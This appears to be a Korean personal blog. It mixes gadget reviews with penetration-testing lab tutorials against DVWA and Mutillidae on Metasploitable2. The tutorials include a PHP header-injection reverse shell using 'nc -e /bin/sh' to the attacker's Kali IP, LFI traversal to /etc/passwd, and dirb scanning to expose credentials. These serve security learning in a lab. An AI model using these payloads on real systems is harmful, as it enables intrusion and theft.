운영체제

Window2008 , CentOS , Kali Linux , win7 , metasploitable2 , window XP 

네트워크 환경

VMware 설정은 이런식으로 하셔도되고 다른 아이피의 대역을 쓰셔도되요

CentOS (Gateway)

우클릭 - Settings  

외부에 통신하기 위해 NAT 설정을 해주고 내부에서 통신하기 위해 Host-only를 사용합니다

다른 방식으로 설정해도 무방

 

vi /etc/sysconfig/network-scripts/ifcfg-eth0

vi /etc/sysconfig/network-scripts/ifcfg-eth1

eth0 은 NAT 대역으로 설정과 eth1은 host-only 대역으로 설정 해줍니다

 

service network restart

네트워크를 재시작하여 설정값을 적용시켜줍니다

 

외부에 핑을 보내보면 통신이 잘 되는것을 확인 할 수 있습니다

Ex) ping 8.8.8.8

 

CentOS (User)

우클릭 - Settings  

vi /etc/sysconfig/network-scripts/ifcfg-eth0

위의 CentOS 설정에서 네트워크 어댑터 1개를 만들었기 때문에 eth0 만 설정해주면 됩니다

처음 설정한 CentOS(Gateway) 를 통해 외부와 통신을 합니다

 

service network restart

네트워크 재시작 후 ping 테스트 실시

 

Window2008 (User)

우클릭 - Settings

제어판 -> 네트워크 및 인터넷 -> 네트워크 및 공유센터 -> 로컬영역연결 -> IPv4

변경 후 핑테스트 해보기 

 

Kali (attacker)

 

우클릭 - Settings  

vi /etc/network/interfaces

공격자 PC 이기 때문에 NAT설정도 해줍니다

 

systemctl restart networking

네트워크 재시작 후 핑테스트

'Network Security' 카테고리의 다른 글

네트워크 환경 구축(침투 테스트)  (0) 2019.08.14

# Debugger 종류
   
  GUI
    - OllyDBG
    - Immunity Debugger
    - Ghidra
    - IDA-PRO
    - x64dbg
  
  CLI
    - gdb
    - windbg

이렇게 분류하며 저는 Immunity Debugger를 사용하겠습니다
그리고 작업환경은 xp 를 사용할건데 다른 운영체제를 쓰셔도 되지만
xp 는 주소 값이 다 똑같기 때문에 xp를 사용하겠습니다

Immunity Debugger DownLoad

OllyDBG DonwLoad


'Reversing' 카테고리의 다른 글

Debugger 종류  (0) 2019.05.17

안녕하세요 보람줄입니다


드디어 기다리고 기다리던 M.2 SSD 512GB가 도착했어요!! 




[제품명]

Kingspec m.2 SSD 2242 512GB



[구성품]

M.2 512GB, 나사 



레노버 아이디어패드 530s-14 Mighty i5 노트북 하판 (장착전)

오른쪽 하단에 보시면 장착할 수 있는 공간이 있습니다 



레노버 아이디어패드 530s-14 Mighty i5 노트북하판 (장착후)




장착 후 컴퓨터를 실행하면 바로 쓸 수는 없고 디스크를 한번 포멧해서 사용해야 합니다


내 PC 우클릭 -> 관리 -> 저장소 디스크 -> 관리 -> 포멧 후 사용



레노버 고객센터에 전화해서 SSD 추가 여부에 대해 상담사분께 여쭤 봤는데 안된다고 하셨지만 

혹시 몰라 하판을 뜯어본 결과 42mm 규격의 SSD의 장착 자리가 있어 상담사분께 얘기하니 장착 자리가 아니고 비어있는 공간이라고만 하셔서 하판 분해한 사진을 메일로 보내드렸습니다 


메일확인하시고 다시 전화통화를 했는데 현재 사용하시는 제품으론 이 공간을 사용할 수 없고 상위 모델이 사용할 수 있다고 하시면서 이 제품을 출고할 때 이 부분을 제거하지 않고 출고한거라 사용할 순 없지만 공간은 남아있다고 하셨습니다


그렇지만 하드디스크를 한개만 쓰기엔 너무나도 불편했기 때문에 SSD카드를 구매후 장착해본 결과 매우 정상적으로 작동합니다!!


상담사님이 계속 안된다고 하셔서 구매할까 말까 고민도 많이 했고 구매한 이후로도 계속 걱정했지만 문제없이 작동하니 되게 기분좋네요~



해외에서 구매했기 때문에 배송시간이 오래걸려 기다리기 너무 힘들었습니다 ㅠㅠ


나중에 문제생기면 다시 글올릴게요!!

안녕하세요 보람줄입니다


오늘은 ipTIME 개봉기를 해보겠습니다!



외장하드가 남는게 있길래 형식으로 사용해보고 싶어서 구매했습니다



[제품명] 

ipTIME A3004NS-M



[구성품]

어뎁터, A3004NS-M, 보증서, 랜 케이블






열이나는 것을 방지해 땅에 안붙게 고무로 되어 있네요! 



사용해본 결과 그냥 와이파이나, 컴퓨터 연결시 문제없이 작동합니다..



그치만 IPTV 를 사용하려고 구매하신 분들은 추천하지 않습니다 ..


TV를 볼 때 첨에는 문제없이 작동하는데 채널을 돌릴경우 신호대기중... 이라는 문구가 발생 후 대기시간이 많이 소요됐기 때문에 저는 IPTV만을 바라보고 구매를 한다면 비추천합니다 !



안녕하세요 보람줄입니다


제가 노트북을 사용하다 보니 용량이 부족하여 외장하드를 알아보던 중

타무즈 EX3 SSD 512GB 외장하드가 제일 좋은거 같아 구매를 했습니다! 


[제품명]

타무즈 EX3 SSD 512GB 블랙


[구성품]

케이블, EX3 512GB 외장하드 설치 가이드, 보증안내서


구매를 했기에 사용을 해보고싶어 이것저것 받았습니다..!!


근데 속도가 일반 데스크탑 HDD 보다 느린거같네요 ..ㅠㅠㅠ


무튼 잘 써보도록 하겠습니다!!



+수정


제품을 쓰려는데 속도가 너무 늦어서 속도 측정을 해본 결과 아래 같이 나오네요 ..


제품 문의를 해봤지만 빈데이터로 다시 해보라고 하셔서 해봤습니다


3.1 연결로 한건데도 마찬가지로 속도가 안나오네요.. 


처음 문의 했을 때엔 캡처로 메일 보내주시면 확인 후 연락주신다고 하셔서 메일을 보내드렸고 하루가 지나도 연락이 없으셔서 제가 직접 전화로 상황설명 첨부터 다시 해드렸더니 바로 확인해 주신다고 하시고 설명 받았습니다


근데 제품문제상 쓰기는 나오는데 읽기가 안나오는 불량은 거의 없기 때문에 사용자 설정이 문제인거 같다고 하셔서 체크해본다고 한 뒤 여러 컴퓨터에서 설정까지 다해봤지만 여전히 속도가 안나와서 다음날  다시 연락드렸습니다 


여차저차 반품신청하고 타무즈회사에 택배가 도착 후 일주일이 지나도 연락이 없으시길래 제가 다시 연락드려서 택배 도착한지 일주일 정도 지난거 같은데 연락없으셔서 전화 드렸다고 얘기하니깐 확인 절차 끝나고 불량이면 연락 주신다했는데 연락없이 반품 완료 됐네요 .. 하하... 


무튼 반품처리하기까지 되게 오래 걸렸네요 ㅠㅠ


안녕하세요 보람줄입니다


proxy를 사용하여 서버에 보내주는 요청을 가로채서 코드(데이터)를 수정해보겠습니다


이전 글

https://leah.kr/83



burpsuite 실행



동의






Proxy -> Options


본인의 아이피인 루프백주소와 포트8080을 사용한다는 것 확인



Firefox 실행



설정






루프백주소와 포트번호 입력



Proxy -> Intercept


활성화가 되어있는지 확인 



url 재입력


prxoy를 활성화를 한 뒤 주소창을 재입력



Proxy -> Intercept -> Headers


헤더에 들어간 후 User-Agent 의 값을 <?php phpinfo() ?>로 변경해줍니다



Forward




쿠키/캐시 삭제


만약 아무런 변화가 없다면 데이터를 삭제해줍니다



접속 후 모습


웹서버의 모든 정보들을 확인할 수 있습니다



allow_url_include


allow_url_include가 만약 on으로 되어 있다면 url을 통해 파일을 업로드 할 수 있습니다




passthru() 함수를 이용하여 외부에서 원격으로 프로그램을 수정해보겠습니다


kali

netcat -h


줄여서 nc -h 라고 입력해도 됩니다


옵션을 볼 수 있어 모르는경우 -h 옵션을 주어 확인해줍니다


-l  : 포트를 열어주겠다는 뜻

-p : 사용할 포트번호


netstat -ant | grep 2222


터미널을 하나 더 열어 포트가 잘 열려있는지 확인해줍니다




다시한번 주소입력



<?php passthru("nc -e /bin/sh 192.168.1.120 2222") ?> 


칼리 자신의 아이피를 적은 후 아까 열어둔 포트를 적어줍니다



Forward 하신후 off 해주셔도 됩니다



접속완료


접속이 되신다면 파일 생성 및 제거 확인 전부 가능합니다

LFI 란 ?


웹 브라우저의 URL을 이용해 공격 대상 서버에 파일을 포함시키는 과정의 공격입니다 



실습을 하기 위해 칼리(kali)와 메타스플로잇터블(metasploitable2)을 실행시켜줍니다



Kali

firefox https://meta &  ( 메타스플로잇터블 아이피를 입력하셔도 됨 )



http://meta/index.php

인터넷 창이 열리면 DVWA 를 눌러 접속해 줍니다



로그인 페이지

ID  : admin

PW : password



보안레벨 낮추기



보안 레벨을 낮춰 웹페이지를 취약하게(LFI 취약점이 있는 코드) 만들어 연습을 해보겠습니다



File Inclusion



주소창에 일부러 오류를 내어 서버내에 있는 include.php파일의 경로를 확인할 수 있으며,

View Source 를 통해 웹페이지의 보안이 어떤식으로 짜여져 있는지 확인 할 수 있습니다



http://meta/dvwa/vulnerabilities/fi/?page=include.phphi


/var/www/dvwa/vulnerabilities/fi/index.php

위의 위치는 해당 서버 index.php 의 경로를 최상위 경로부터 절대경로로 나타낸 것 입니다


여기서 문자들을 상위로 이동하는 명령어인 .. 을 붙여 최상위인 루트로 이동 후

/etc/passwd 사용자 계정정보에 접속해보겠습니다



http://meta/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd



http://meta/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ


프로세스에 영향을 미치는 환경 변수들의 이름과 값을 확인할 수 있습니다



proxy를 사용하여 주소를 탈취하여 수정해보기

https://leah.kr/84


안녕하세요 보람줄입니다


dirb은 절대 실 사이트에 하면 안됩니다


우선 전에 같이 다운받은 Metasploitable2 를 실행시켜줍니다


그 후 Kali Linux를 켠 후 firefox https://meta &를 입력해 해당주소로 들어가줍니다



firefox http://meta &


여기서 Mutillidae 를 스캐닝 하여 아이디 비밀번호를 찾아 로그인까지 해보겠습니다



dirb -help


dirb를 사용하기 위한 도움말



dirb http://meta/mutillidae


/usr/share/dirb/wordlists/common.txt 에 의거하여

http://meta/mutillidae 주소를 스캐닝한다는 뜻입니다


찾아와야 하는 내용이 없을 경우는 common.txt에 직접 추가해주어야합니다



Scanning




http://meta/mutillidae/robots.txt

주소를 인터넷창에 직접입력해도 되지만 우클릭 Open Link로 쉽게 들어갈 수도 있습니다




홈페이지 크롤링 허용/차단 페이지



http://meta/mutillidae/passwords/

같은 방법으로 접속해준 뒤 accounts.txt 를 클릭해줍니다




관리자의 아이디 비번확인 후 로그인을 해줍니다


ID  : admin

PW : adminpass




metasploitable2 mutillidae 데이터베이스오류 


로그인 하기 전 metasploitable2에 접속을 해 mutillidae의 데이터베이스를 변경해 주어야합니다


ID  : msfadmin

PW : msfadmin


sudo -s

 

PW : msfadmin



vi /var/www/mutillidae/config.inc



dbname = 'metasploit' -> dbname = 'owasp10' 으로 변경후

:wq 를 입력해 저장해줍니다




/etc/init.d/apache2 restart


apache2 재시작



로그인


그 다음 meta/mutillidae/password/accounts.txt 에서 확인한 아이디들로 로그인이 되는 것을 볼 수 있습니다





다른 아이디들도 로그인 한 뒤 옆의 출력메시지도 확인해주세요


+ 최근 게시물